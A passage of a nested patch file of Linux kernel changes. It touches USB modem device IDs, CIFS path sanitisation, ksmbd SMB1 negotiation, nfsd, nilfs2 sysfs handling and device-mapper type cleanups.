++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, 0x0900, 0xff, 0, 0), /* RM500U-CN */
++	  .driver_info = ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+@@ -1300,6 +1302,14 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1075, 0xff),	/* Telit FN990 (PCIe) */
+ 	  .driver_info = RSVD(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1080, 0xff),	/* Telit FE990 (rmnet) */
++	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(2) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1081, 0xff),	/* Telit FE990 (MBIM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1082, 0xff),	/* Telit FE990 (RNDIS) */
++	  .driver_info = NCTRL(2) | RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1083, 0xff),	/* Telit FE990 (ECM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910),
+ 	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910_DUAL_MODEM),
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 3a42313d0d66e..4075c0d7e6a2c 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -112,8 +112,12 @@ static int dp_altmode_configure(struct dp_altmode *dp, u8 con)
+ 		if (dp->data.status & DP_STATUS_PREFER_MULTI_FUNC &&
+ 		    pin_assign & DP_PIN_ASSIGN_MULTI_FUNC_MASK)
+ 			pin_assign &= DP_PIN_ASSIGN_MULTI_FUNC_MASK;
+-		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK)
++		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK) {
+ 			pin_assign &= DP_PIN_ASSIGN_DP_ONLY_MASK;
++			/* Default to pin assign C if available */
++			if (pin_assign & BIT(DP_PIN_ASSIGN_C))
++				pin_assign = BIT(DP_PIN_ASSIGN_C);
++		}
+ 
+ 		if (!pin_assign)
+ 			return -EINVAL;
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+index 45119597c7655..89e810b27a4bf 100644
+--- a/fs/cifs/fs_context.c
++++ b/fs/cifs/fs_context.c
+@@ -441,13 +441,14 @@ out:
+  * but there are some bugs that prevent rename from working if there are
+  * multiple delimiters.
+  *
+- * Returns a sanitized duplicate of @path. The caller is responsible for
+- * cleaning up the original.
++ * Returns a sanitized duplicate of @path. @gfp indicates the GFP_* flags
++ * for kstrdup.
++ * The caller is responsible for freeing the original.
+  */
+ #define IS_DELIM(c) ((c) == '/' || (c) == '\\')
+-static char *sanitize_path(char *path)
++char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
+ {
+-	char *cursor1 = path, *cursor2 = path;
++	char *cursor1 = prepath, *cursor2 = prepath;
+ 
+ 	/* skip all prepended delimiters */
+ 	while (IS_DELIM(*cursor1))
+@@ -469,7 +470,7 @@ static char *sanitize_path(char *path)
+ 		cursor2--;
+ 
+ 	*(cursor2) = '\0';
+-	return kstrdup(path, GFP_KERNEL);
++	return kstrdup(prepath, gfp);
+ }
+ 
+ /*
+@@ -531,7 +532,7 @@ smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
+ 	if (!*pos)
+ 		return 0;
+ 
+-	ctx->prepath = sanitize_path(pos);
++	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
+ 	if (!ctx->prepath)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index a268896d05d57..26093f54d3e65 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
+@@ -287,4 +287,7 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+ #define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
++
++extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
++
+ #endif
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 832856aef4b7a..cf19e6a81ed99 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1304,7 +1304,7 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	kfree(cifs_sb->prepath);
+ 
+ 	if (prefix && *prefix) {
+-		cifs_sb->prepath = kstrdup(prefix, GFP_ATOMIC);
++		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
+ 		if (!cifs_sb->prepath)
+ 			return -ENOMEM;
+ 
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 2be9d7460494b..b8f9d627f241d 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -326,10 +326,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+-		conn->request_buf = kvmalloc(size,
+-					     GFP_KERNEL |
+-					     __GFP_NOWARN |
+-					     __GFP_NORETRY);
++		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+ 		if (!conn->request_buf)
+ 			break;
+ 
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index a0d635304754a..651d1d01234be 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -289,10 +289,7 @@ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ 	work->request_buf = conn->request_buf;
+ 	conn->request_buf = NULL;
+ 
+-	if (ksmbd_init_smb_server(work)) {
+-		ksmbd_free_work_struct(work);
+-		return -EINVAL;
+-	}
++	ksmbd_init_smb_server(work);
+ 
+ 	ksmbd_conn_enqueue_request(work);
+ 	atomic_inc(&conn->r_count);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index daaee7a89e050..4effe8df5ae92 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -235,9 +235,6 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	struct smb2_negotiate_rsp *rsp;
+ 	struct ksmbd_conn *conn = work->conn;
+ 
+-	if (conn->need_neg == false)
+-		return -EINVAL;
+-
+ 	*(__be32 *)work->response_buf =
+ 		cpu_to_be32(conn->vals->header_size);
+ 
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 3d9e8d8a5762b..95afb6b23a91c 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -283,20 +283,121 @@ err_out:
+ 	return BAD_PROT_ID;
+ }
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work)
++#define SMB_COM_NEGOTIATE_EX	0x0
++
++/**
++ * get_smb1_cmd_val() - get smb command value from smb header
++ * @work:	smb work containing smb header
++ *
++ * Return:      smb command value
++ */
++static u16 get_smb1_cmd_val(struct ksmbd_work *work)
+ {
+-	struct ksmbd_conn *conn = work->conn;
++	return SMB_COM_NEGOTIATE_EX;
++}
+ 
+-	if (conn->need_neg == false)
++/**
++ * init_smb1_rsp_hdr() - initialize smb negotiate response header
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++static int init_smb1_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
++	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
++
++	/*
++	 * Remove 4 byte direct TCP header.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4);
++
++	rsp_hdr->Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
++	rsp_hdr->Flags = SMBFLG_RESPONSE;
++	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++	rsp_hdr->Pid = rcv_hdr->Pid;
++	rsp_hdr->Mid = rcv_hdr->Mid;
++	return 0;
++}
++
++/**
++ * smb1_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb1_check_user_session(struct ksmbd_work *work)
++{
++	unsigned int cmd = work->conn->ops->get_cmd_val(work);
++
++	if (cmd == SMB_COM_NEGOTIATE_EX)
+ 		return 0;
+ 
+-	init_smb3_11_server(conn);
++	return -EINVAL;
++}
++
++/**
++ * smb1_allocate_rsp_buf() - allocate response buffer for a command
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL | __GFP_ZERO);
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++
++	if (!work->response_buf) {
++		pr_err("Failed to allocate %u bytes buffer\n",
++				MAX_CIFS_SMALL_BUFFER_SIZE);
++		return -ENOMEM;
++	}
+ 
+-	if (conn->ops->get_cmd_val(work) != SMB_COM_NEGOTIATE)
+-		conn->need_neg = false;
+ 	return 0;
+ }
+ 
++static struct smb_version_ops smb1_server_ops = {
++	.get_cmd_val = get_smb1_cmd_val,
++	.init_rsp_hdr = init_smb1_rsp_hdr,
++	.allocate_rsp_buf = smb1_allocate_rsp_buf,
++	.check_user_session = smb1_check_user_session,
++};
++
++static int smb1_negotiate(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
++}
++
++static struct smb_version_cmds smb1_server_cmds[1] = {
++	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
++};
++
++static void init_smb1_server(struct ksmbd_conn *conn)
++{
++	conn->ops = &smb1_server_ops;
++	conn->cmds = smb1_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++}
++
++void ksmbd_init_smb_server(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	__le32 proto;
++
++	if (conn->need_neg == false)
++		return;
++
++	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER)
++		init_smb1_server(conn);
++	else
++		init_smb3_11_server(conn);
++}
++
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+ 				      struct ksmbd_file *dir,
+ 				      struct ksmbd_dir_info *d_info,
+@@ -444,20 +545,10 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+ 
+-	/*
+-	 * Remove 4 byte direct TCP header, add 2 byte bcc and
+-	 * 2 byte DialectIndex.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	/* Add 2 byte bcc and 2 byte DialectIndex. */
++	inc_rfc1001_len(work->response_buf, 4);
+ 	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+ 
+-	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
+-	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
+-	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
+-	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
+-		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
+-
+ 	neg_rsp->hdr.WordCount = 1;
+ 	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+ 	neg_rsp->ByteCount = 0;
+@@ -473,24 +564,13 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		ksmbd_negotiate_smb_dialect(work->request_buf);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+ 
+-	if (command == SMB2_NEGOTIATE_HE) {
+-		struct smb2_hdr *smb2_hdr = smb2_get_msg(work->request_buf);
+-
+-		if (smb2_hdr->ProtocolId != SMB2_PROTO_NUMBER) {
+-			ksmbd_debug(SMB, "Downgrade to SMB1 negotiation\n");
+-			command = SMB_COM_NEGOTIATE;
+-		}
+-	}
+-
+ 	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+-		init_smb2_neg_rsp(work);
+ 		return ret;
+ 	}
+ 
+ 	if (command == SMB_COM_NEGOTIATE) {
+ 		if (__smb2_negotiate(conn)) {
+-			conn->need_neg = true;
+ 			init_smb3_11_server(conn);
+ 			init_smb2_neg_rsp(work);
+ 			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index c1f3006792ff6..78c44978a906a 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -427,7 +427,7 @@ bool ksmbd_smb_request(struct ksmbd_conn *conn);
+ 
+ int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work);
++void ksmbd_init_smb_server(struct ksmbd_work *work);
+ 
+ struct ksmbd_kstat;
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+diff --git a/fs/namespace.c b/fs/namespace.c
+index df137ba19d375..e04a9e9e3f14f 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -4180,9 +4180,9 @@ out:
+ 	unlock_mount_hash();
+ 
+ 	if (kattr->propagation) {
+-		namespace_unlock();
+ 		if (err)
+ 			cleanup_group_ids(mnt, NULL);
++		namespace_unlock();
+ 	}
+ 
+ 	return err;
+diff --git a/fs/nfsd/blocklayout.c b/fs/nfsd/blocklayout.c
+index b6d01d51a7465..e7e6e78d965db 100644
+--- a/fs/nfsd/blocklayout.c
++++ b/fs/nfsd/blocklayout.c
+@@ -296,6 +296,7 @@ nfsd4_block_get_device_info_scsi(struct super_block *sb,
+ 
+ out_free_dev:
+ 	kfree(dev);
++	gdp->gd_device = NULL;
+ 	return ret;
+ }
+ 
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index 6253cbe5f81b4..39989c14c8a1e 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -874,8 +874,8 @@ static const struct cred *get_backchannel_cred(struct nfs4_client *clp, struct r
+ 		if (!kcred)
+ 			return NULL;
+ 
+-		kcred->uid = ses->se_cb_sec.uid;
+-		kcred->gid = ses->se_cb_sec.gid;
++		kcred->fsuid = ses->se_cb_sec.uid;
++		kcred->fsgid = ses->se_cb_sec.gid;
+ 		return kcred;
+ 	}
+ }
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 8377e14b8fba9..8f5b41dc07734 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2417,10 +2417,12 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 	for (i = 0; i < argp->opcnt; i++) {
+ 		op = &argp->ops[i];
+ 		op->replay = NULL;
++		op->opdesc = NULL;
+ 
+ 		if (xdr_stream_decode_u32(argp->xdr, &op->opnum) < 0)
+ 			return false;
+ 		if (nfsd4_opnum_in_range(argp, op)) {
++			op->opdesc = OPDESC(op);
+ 			op->status = nfsd4_dec_ops[op->opnum](argp, &op->u);
+ 			if (op->status != nfs_ok)
+ 				trace_nfsd_compound_decode_err(argp->rqstp,
+@@ -2431,7 +2433,7 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 			op->opnum = OP_ILLEGAL;
+ 			op->status = nfserr_op_illegal;
+ 		}
+-		op->opdesc = OPDESC(op);
++
+ 		/*
+ 		 * We'll try to cache the result in the DRC if any one
+ 		 * op in the compound wants to be cached:
+@@ -5351,10 +5353,8 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	__be32 *p;
+ 
+ 	p = xdr_reserve_space(xdr, 8);
+-	if (!p) {
+-		WARN_ON_ONCE(1);
+-		return;
+-	}
++	if (!p)
++		goto release;
+ 	*p++ = cpu_to_be32(op->opnum);
+ 	post_err_offset = xdr->buf->len;
+ 
+@@ -5369,8 +5369,6 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	op->status = encoder(resp, op->status, &op->u);
+ 	if (op->status)
+ 		trace_nfsd_compound_encode_err(rqstp, op->opnum, op->status);
+-	if (opdesc && opdesc->op_release)
+-		opdesc->op_release(&op->u);
+ 	xdr_commit_encode(xdr);
+ 
+ 	/* nfsd4_check_resp_size guarantees enough room for error status */
+@@ -5411,6 +5409,9 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	}
+ status:
+ 	*p = op->status;
++release:
++	if (opdesc && opdesc->op_release)
++		opdesc->op_release(&op->u);
+ }
+ 
+ /* 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 3335ef3529155..63d96a1733b2a 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2607,11 +2607,10 @@ static int nilfs_segctor_thread(void *arg)
+ 	goto loop;
+ 
+  end_thread:
+-	spin_unlock(&sci->sc_state_lock);
+-
+ 	/* end sync. */
+ 	sci->sc_task = NULL;
+ 	wake_up(&sci->sc_wait_task); /* for nilfs_segctor_kill_thread() */
++	spin_unlock(&sci->sc_state_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 1422b8ba24ed6..77f1e5778d1c8 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -482,6 +482,7 @@ static void nilfs_put_super(struct super_block *sb)
+ 		up_write(&nilfs->ns_sem);
+ 	}
+ 
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+@@ -1105,6 +1106,7 @@ nilfs_fill_super(struct super_block *sb, void *data, int silent)
+ 	nilfs_put_root(fsroot);
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 3a4c9c150cbf5..2894152a6b25c 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -87,7 +87,6 @@ void destroy_nilfs(struct the_nilfs *nilfs)
+ {
+ 	might_sleep();
+ 	if (nilfs_init(nilfs)) {
+-		nilfs_sysfs_delete_device_group(nilfs);
+ 		brelse(nilfs->ns_sbh[0]);
+ 		brelse(nilfs->ns_sbh[1]);
+ 	}
+@@ -305,6 +304,10 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 		goto failed;
+ 	}
+ 
++	err = nilfs_sysfs_create_device_group(sb);
++	if (unlikely(err))
++		goto sysfs_error;
++
+ 	if (valid_fs)
+ 		goto skip_recovery;
+ 
+@@ -366,6 +369,9 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 	goto failed;
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
++
++ sysfs_error:
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_dat);
+@@ -697,10 +703,6 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 	if (err)
+ 		goto failed_sbh;
+ 
+-	err = nilfs_sysfs_create_device_group(sb);
+-	if (err)
+-		goto failed_sbh;
+-
+ 	set_nilfs_init(nilfs);
+ 	err = 0;
+  out:
+diff --git a/include/acpi/video.h b/include/acpi/video.h
+index 8ed9bec03e534..ff5a8da5d8832 100644
+--- a/include/acpi/video.h
++++ b/include/acpi/video.h
+@@ -59,8 +59,6 @@ extern void acpi_video_unregister(void);
+ extern void acpi_video_register_backlight(void);
+ extern int acpi_video_get_edid(struct acpi_device *device, int type,
+ 			       int device_id, void **edid);
+-extern enum acpi_backlight_type acpi_video_get_backlight_type(void);
+-extern bool acpi_video_backlight_use_native(void);
+ /*
+  * Note: The value returned by acpi_video_handles_brightness_key_presses()
+  * may change over time and should not be cached.
+@@ -69,6 +67,19 @@ extern bool acpi_video_handles_brightness_key_presses(void);
+ extern int acpi_video_get_levels(struct acpi_device *device,
+ 				 struct acpi_video_device_brightness **dev_br,
+ 				 int *pmax_level);
++
++extern enum acpi_backlight_type __acpi_video_get_backlight_type(bool native,
++								bool *auto_detect);
++
++static inline enum acpi_backlight_type acpi_video_get_backlight_type(void)
++{
++	return __acpi_video_get_backlight_type(false, NULL);
++}
++
++static inline bool acpi_video_backlight_use_native(void)
++{
++	return __acpi_video_get_backlight_type(true, NULL) == acpi_backlight_native;
++}
+ #else
+ static inline void acpi_video_report_nolcd(void) { return; };
+ static inline int acpi_video_register(void) { return -ENODEV; }
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 6c0c3dc3d3aca..32c764fb9cb56 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -841,7 +841,8 @@ int drm_dp_add_payload_part2(struct drm_dp_mst_topology_mgr *mgr,
+ 			     struct drm_dp_mst_atomic_payload *payload);
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload);
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload);
+ 
+ int drm_dp_check_act_status(struct drm_dp_mst_topology_mgr *mgr);
+ 
+diff --git a/include/kvm/arm_pmu.h b/include/kvm/arm_pmu.h
+index c0b868ce6a8f2..96b192139a23a 100644
+--- a/include/kvm/arm_pmu.h
++++ b/include/kvm/arm_pmu.h
+@@ -11,7 +11,6 @@
+ #include <asm/perf_event.h>
+ 
+ #define ARMV8_PMU_CYCLE_IDX		(ARMV8_PMU_MAX_COUNTERS - 1)
+-#define ARMV8_PMU_MAX_COUNTER_PAIRS	((ARMV8_PMU_MAX_COUNTERS + 1) >> 1)
+ 
+ #ifdef CONFIG_HW_PERF_EVENTS
+ 
+@@ -29,7 +28,6 @@ struct kvm_pmu {
+ 	struct irq_work overflow_work;
+ 	struct kvm_pmu_events events;
+ 	struct kvm_pmc pmc[ARMV8_PMU_MAX_COUNTERS];
+-	DECLARE_BITMAP(chained, ARMV8_PMU_MAX_COUNTER_PAIRS);
+ 	int irq_num;
+ 	bool created;
+ 	bool irq_level;
+diff --git a/include/linux/device-mapper.h b/include/linux/device-mapper.h
+index 04c6acf7faaa5..201dd1ab7f1c6 100644
+--- a/include/linux/device-mapper.h
++++ b/include/linux/device-mapper.h
+@@ -87,10 +87,10 @@ typedef int (*dm_preresume_fn) (struct dm_target *ti);
+ typedef void (*dm_resume_fn) (struct dm_target *ti);
+ 
+ typedef void (*dm_status_fn) (struct dm_target *ti, status_type_t status_type,
+-			      unsigned status_flags, char *result, unsigned maxlen);
++			      unsigned int status_flags, char *result, unsigned int maxlen);
+ 
+-typedef int (*dm_message_fn) (struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen);
++typedef int (*dm_message_fn) (struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen);
+ 
+ typedef int (*dm_prepare_ioctl_fn) (struct dm_target *ti, struct block_device **bdev);
+ 
+@@ -187,7 +187,7 @@ struct target_type {
+ 	uint64_t features;
+ 	const char *name;
+ 	struct module *module;
+-	unsigned version[3];
++	unsigned int version[3];
+ 	dm_ctr_fn ctr;
+ 	dm_dtr_fn dtr;
+ 	dm_map_fn map;
+@@ -313,31 +313,31 @@ struct dm_target {
+ 	 * It is a responsibility of the target driver to remap these bios
+ 	 * to the real underlying devices.
+ 	 */
+-	unsigned num_flush_bios;
++	unsigned int num_flush_bios;
+ 
+ 	/*
+ 	 * The number of discard bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_discard_bios;
++	unsigned int num_discard_bios;
+ 
+ 	/*
+ 	 * The number of secure erase bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_secure_erase_bios;
++	unsigned int num_secure_erase_bios;
+ 
+ 	/*
+ 	 * The number of WRITE ZEROES bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_write_zeroes_bios;
++	unsigned int num_write_zeroes_bios;
+ 
+ 	/*
+ 	 * The minimum number of extra bytes allocated in each io for the
+ 	 * target to use.
+ 	 */
+-	unsigned per_io_data_size;
++	unsigned int per_io_data_size;
+ 
+ 	/* target specific data */
+ 	void *private;
+@@ -383,7 +383,7 @@ struct dm_target {
+ 
+ void *dm_per_bio_data(struct bio *bio, size_t data_size);
+ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size);
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio);
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio);
+ 
+ u64 dm_start_time_ns_from_clone(struct bio *bio);
+ 
+@@ -394,7 +394,7 @@ void dm_unregister_target(struct target_type *t);
+  * Target argument parsing.
+  */
+ struct dm_arg_set {
+-	unsigned argc;
++	unsigned int argc;
+ 	char **argv;
+ };
+ 
+@@ -403,8 +403,8 @@ struct dm_arg_set {
+  * the error message to use if the number is found to be outside that range.
+  */
+ struct dm_arg {
+-	unsigned min;
+-	unsigned max;
++	unsigned int min;
++	unsigned int max;
+ 	char *error;
+ };
+ 
+@@ -413,7 +413,7 @@ struct dm_arg {
+  * returning -EINVAL and setting *error.
+  */
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error);
++		unsigned int *value, char **error);
+ 
+ /*
+  * Process the next argument as the start of a group containing between
+@@ -421,7 +421,7 @@ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+  * *num_args or, if invalid, return -EINVAL and set *error.
+  */
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *num_args, char **error);
++		      unsigned int *num_args, char **error);
+ 
+ /*
+  * Return the current argument and shift to the next.
+@@ -431,7 +431,7 @@ const char *dm_shift_arg(struct dm_arg_set *as);
+ /*
+  * Move through num_args arguments.
+  */
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args);
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args);
+ 
+ /*-----------------------------------------------------------------
+  * Functions for creating and manipulating mapped devices.
+@@ -461,7 +461,7 @@ void *dm_get_mdptr(struct mapped_device *md);
+ /*
+  * A device can still be used while suspended, but I/O is deferred.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags);
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags);
+ int dm_resume(struct mapped_device *md);
+ 
+ /*
+@@ -481,7 +481,7 @@ struct gendisk *dm_disk(struct mapped_device *md);
+ int dm_suspended(struct dm_target *ti);
+ int dm_post_suspending(struct dm_target *ti);
+ int dm_noflush_suspending(struct dm_target *ti);
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors);
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors);
+ void dm_submit_bio_remap(struct bio *clone, struct bio *tgt_clone);
+ union map_info *dm_get_rq_mapinfo(struct request *rq);
+ 
+@@ -525,7 +525,7 @@ int dm_set_geometry(struct mapped_device *md, struct hd_geometry *geo);
+  * First create an empty table.
+  */
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md);
++		    unsigned int num_targets, struct mapped_device *md);
+ 
+ /*
+  * Then call this once for each target.
+diff --git a/include/linux/dm-bufio.h b/include/linux/dm-bufio.h
+index 15d9e15ca830d..1262d92ab88fc 100644
+--- a/include/linux/dm-bufio.h
++++ b/include/linux/dm-bufio.h
+@@ -26,8 +26,8 @@ struct dm_buffer;
+  * Create a buffered IO cache on a given device
+  */
+ struct dm_bufio_client *
+-dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-		       unsigned reserved_buffers, unsigned aux_size,
